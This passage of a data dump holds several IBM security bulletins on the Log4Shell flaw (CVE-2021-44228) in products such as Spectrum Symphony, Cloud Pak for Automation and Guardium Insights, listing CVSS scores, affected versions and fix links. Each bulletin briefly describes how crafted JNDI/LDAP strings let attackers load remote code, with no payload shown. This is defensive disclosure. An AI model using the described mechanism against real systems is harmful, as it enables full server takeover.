like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## 
Change History\n\n14 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS4H63\",\"label\":\"IBM Spectrum Conductor\"},\"Component\":\"ASCD\\/PMC\\/Explorer\\/conductorspark\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"2.5.1;2.5.0;2.4.1\",\"Edition\":\"2.5.1;2.5.0;2.4.1\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-07T16:23:40", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j addressed in IBM Spectrum Conductor", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-07T16:23:40", "id": "2709A19D29B9047D230E570EBF5F26A53D322D557D88CBCFB480F1AFEEF6797C", "href": "https://www.ibm.com/support/pages/node/6526754", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:45:20", "description": "## Summary\n\nLog4j is used by IBM Spectrum Symphony for generating logs in some of its components. This bulletin provides patches for the Log4Shell vulnerability (CVE-2021-44228) to IBM Spectrum Symphony.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n_**Affected Product(s)**_| _**Version(s)**_ \n---|--- \nIBM Spectrum Symphony| 7.2.0.2 \nIBM Spectrum Symphony| 7.2.1, 7.2.1.1 \nIBM Spectrum Symphony| 7.3 \nIBM Spectrum Symphony| 7.3.1 \nIBM Spectrum Symphony| 7.3.2 \n \n## Remediation/Fixes\n\n_**Products**_| _**VRMF**_| _**APAR**_| _**Remediation/First Fix**_ \n---|---|---|--- \nIBM Spectrum Symphony| 7.2.0.2| \n\nP104504\n\nP104509\n\nP104522\n\nP104521\n\n| \n\n[sym-7.2.0.2-build600934](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.0.2-build600934&includeSupersedes=0> \"sym-7.2.0.2-build600934\" )\n\n[sym-7.2.0.2-build600939](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.0.2-build600939&includeSupersedes=0> \"sym-7.2.0.2-build600939\" )\n\n[sym-7.2.0.2-build600941](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.0.2-build600941&includeSupersedes=0> \"sym-7.2.0.2-build600941\" )\n\n[sym-7.2.0.2-build600944](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.0.2-build600944&includeSupersedes=0> \"sym-7.2.0.2-build600944\" ) \n \nIBM Spectrum Symphony| 7.2.1/7.2.1.1| \n\nP104505\n\nP104510\n\nP104524\n\nP104523\n\n| \n\n[sym-7.2.1-build600935](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.1-build600935&includeSupersedes=0> \"sym-7.2.1-build600935\" 
)\n\n[sym-7.2.1-build600940](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.1-build600940&includeSupersedes=0> \"sym-7.2.1-build600940\" )\n\n[sym-7.2.1-build600942](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.1-build600942&includeSupersedes=0> \"sym-7.2.1-build600942\" )\n\n[sym-7.2.1-build600945](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.2.1-build600945&includeSupersedes=0> \"sym-7.2.1-build600945\" ) \n \nIBM Spectrum Symphony| 7.3| \n\nP104506\n\nP104508\n\n| \n\n[sym-7.3-build600936](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build600936&includeSupersedes=0> \"sym-7.3-build600936\" )\n\n[sym-7.3-build600943](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3-build600943&includeSupersedes=0> \"sym-7.3-build600943\" ) \n \nIBM Spectrum Symphony| 7.3.1| P104507| [sym-7.3.1-build600937](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.1-build600937&includeSupersedes=0> \"sym-7.3.1-build600937\" ) \nIBM Spectrum Symphony| 7.3.2| P104511| [sym-7.3.2-build600938](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.2-build600938&includeSupersedes=0> \"sym-7.3.2-build600938\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My 
Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n13 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSZUMP\",\"label\":\"IBM Spectrum Symphony\"},\"Component\":\"GUI\\/PERF\\/ELK\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"7.3.1;7.3;7.2.1;7.2.0.2\",\"Edition\":\"7.3.1;7.3;7.2.1;7.2.0.2\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", 
"userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-07T15:43:37", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j addressed in IBM Spectrum Symphony", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-07T15:43:37", "id": "B7376C4EB80B7D4936C0682206BD2DC0AD5969B181368D3EB95A8FBA366BDB63", "href": "https://www.ibm.com/support/pages/node/6526756", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:44", "description": "## Summary\n\nA remote code execution vulnerability has been reported for log4j-core-2.x libraries, which are used in various components of IBM Cloud Pak for Business Automation.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. 
\nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nICP4A| \n\nV19.x \nV20.x \nV21.0.1 \nV21.0.2 before 21.0.2-IF006 \nV21.0.3 before 21.0.3-IF001 (in 21.0.3, only the ADP component is affected) \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now by upgrading.**\n\nPlease follow this [IBM PSIRT blog post](<https://www.ibm.com/blogs/psirt/an-update-on-the-apache-log4j-cve-2021-44228-vulnerability/> \"IBM PSIRT blog post\" ) to keep up to date with additional information around this vulnerability and how it relates to your IBM products.\n\nFor versions before 21.0.3, the recommended solution is to upgrade to\n\n * IBM Cloud Pak for Business Automation 21.0.2 and apply [IF006](<https://www.ibm.com/support/pages/node/6524920> \"IF006\" ) or later\n * IBM Cloud Pak for Business Automation 20.0.3 and apply [IF012](<https://www.ibm.com/support/pages/node/6539976> \"IF012\" ) or later\n\nas soon as possible. \n\nFor version 21.0.3, the recommended solution is to apply 21.0.3-IF001 or later as soon as possible, see Readme for [Cloud Pak for Business Automation 21.0.3-IF001 for ADP](<https://www.ibm.com/support/pages/node/6528012> \"Cloud Pak for Business Automation 21.0.3-IF001 for ADP\" ) for details.\n\nIBM Cloud Pak for Automation can make use of components in IBM Automation Foundation (IAF). Fixes for CVE-2021-44228 will be included in IAF 1.3.1. New installations of Cloud Pak for Automation 21.0.2-IF006 and later automatically consume the IBM Automation Foundation 1.3 channel. 
Existing installations upgrading to 21.0.2-IF006 or later need to manually update the IAF channel as explained in [Readme for Cloud Pak for Business Automation 21.0.2 IF006](<https://www.ibm.com/support/pages/node/6524920> \"Readme for Cloud Pak for Business Automation 21.0.2 IF006\" ).\n\nIBM Cloud Pak for Automation allows building custom apps on top of the platform. These custom apps can bring their own copy of the vulnerable Log4j library. You must carefully review all your custom apps to identify and upgrade all vulnerable use of the log4j library.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n17 Dec 2021: Initial Publication \n18 Dec 2021: added 21.0.3 (ADP component only) as affected \n15 Jan 2022: added 20.0.3-IF012 fix\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS7JTW\",\"label\":\"IBM Cloud Pak for Automation\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"19.0.x, 20.0.x, 21.0.1, 21.0.2, 21.0.3\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-15T11:12:05", "type": "ibm", "title": "Security Bulletin: Apache Log4j vulnerability affects IBM Cloud Pak for Automation (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": 
"2022-01-15T11:12:05", "id": "55BBC53EEE4090294470AC417A4B8BDE9A26DF232DDD5FC327A46034AF09FE38", "href": "https://www.ibm.com/support/pages/node/6527848", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:45:49", "description": "## Summary\n\nApache Log4j, a dependency of ElasticSearch as used in IBM\u00ae Resilient SOAR, is vulnerable to information disclosure. Elastic Search is used by IBM\u00ae Resilient SOAR for text search. This bulletin provides a mitigation for the vulnerability. Customers are encouraged to update their systems now to address the vulnerability.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nResilient OnPrem| IBM Security SOAR \n \n## Remediation/Fixes\n\n[IBM\u00ae Resilient SOAR v40](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Resilient+SOAR+Platform&release=40.2.73&platform=All&function=fixId&fixids=resilient-40.2.81.run&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"IBM\u00ae Resilient SOAR v40\" )\n\n[IBM\u00ae Resilient SOAR v41](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Resilient+SOAR+Platform&release=40.2.73&platform=All&function=fixId&fixids=soar-41.2.41.run&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"IBM\u00ae Resilient SOAR v41\" )\n\n[IBM\u00ae Resilient SOAR v42](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Resilient+SOAR+Platform&release=All&platform=All&function=fixId&fixids=soar-42.2.39.run&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"IBM\u00ae Resilient SOAR v42\" )\n\n[IBM\u00ae Resilient SOAR v43](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=IBM%20Security&product=ibm/Other+software/IBM+Resilient+SOAR+Platform&release=All&platform=All&function=fixId&fixids=soar-43.0.7661.run&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"IBM\u00ae Resilient SOAR v43\" )\n\nIf you are unable to update your IBM Security SOAR to one of the above versions please see the Workarounds and Mitigations below.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 
Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n14 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU008\",\"label\":\"Security\"},\"Product\":{\"code\":\"SSDVCX\",\"label\":\"IBM Resilient\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"40, 41, 42, 43\",\"Edition\":\"\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-23T17:25:01", "type": "ibm", "title": "Security Bulletin: A dependency of ElasticSearch as used in IBM\u00ae Resilient SOAR is vulnerable to Apache Log4j (CVE-2021-44228).", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-23T17:25:01", "id": "BD8AEC08AE2FA3C7B6CDD03A046DE8D2D846B9AC7A7C2948B791173D0622B3A4", "href": "https://www.ibm.com/support/pages/node/6529192", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:46:27", "description": "## Summary\n\nIBM Security Guardium Insights is vulnerable to a remote code execution vulnerability in Apache Log4j 2 component. IBM Security Guardium Insights has addressed the vulnerability (CVE-2021-44228) with an upgrade. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Security Guardium Insights| 3.0.2 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now by upgrading.**\n\n**Product**\n\n| \n\n**VRMF**\n\n| \n\n**Remediation / Fix** \n \n---|---|--- \nIBM Security Guardium Insights| 3.0.2| | \n\n \nPlease download **v3.1 **<https://www.ibm.com/software/passportadvantage/>\n\n\\- refer to the **Release Notes** for details including install instructions \n \n--- \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n20 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSMPHH\",\"label\":\"IBM Security Guardium\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"3.0.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T20:32:21", "type": "ibm", "title": "Security Bulletin: IBM Security Guardium Insights is vulnerable to a remote code execution vulnerability in Apache Log4j 2 component. 
(CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-20T20:32:21", "id": "77C0F01606E7883D65A2981E1E5DAEA1712E790E6D5528DDD17691C666E43D15", "href": "https://www.ibm.com/support/pages/node/6528432", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-11T06:01:59", "description": "## Summary\n\nIBM Content Navigator container deployments are vulnerable to a remote execution vulnerability. IBM Content Navigator has addressed the vulnerability as described below.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Content Navigator| 3.0 Continuous Delivery \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now by upgrading.**\n\nProduct| VRMF| Remediation / First Fix \n---|---|--- \nIBM Content Navigator| 3.0 Continuous Delivery| IBM Content Navigator container - ICN 3.0.9 LA 008, ICN 3.0.10 LA 004 / Task Manager container - TM 3.0.10 LA004, TM 3.0.9 LA008, 3.0.7 TM LA101. \n \n## Workarounds and Mitigations\n\nFor more information about how this vulnerability affects IBM Content Navigator, see this technote: <https://www.ibm.com/support/pages/node/6526164>\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n17 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
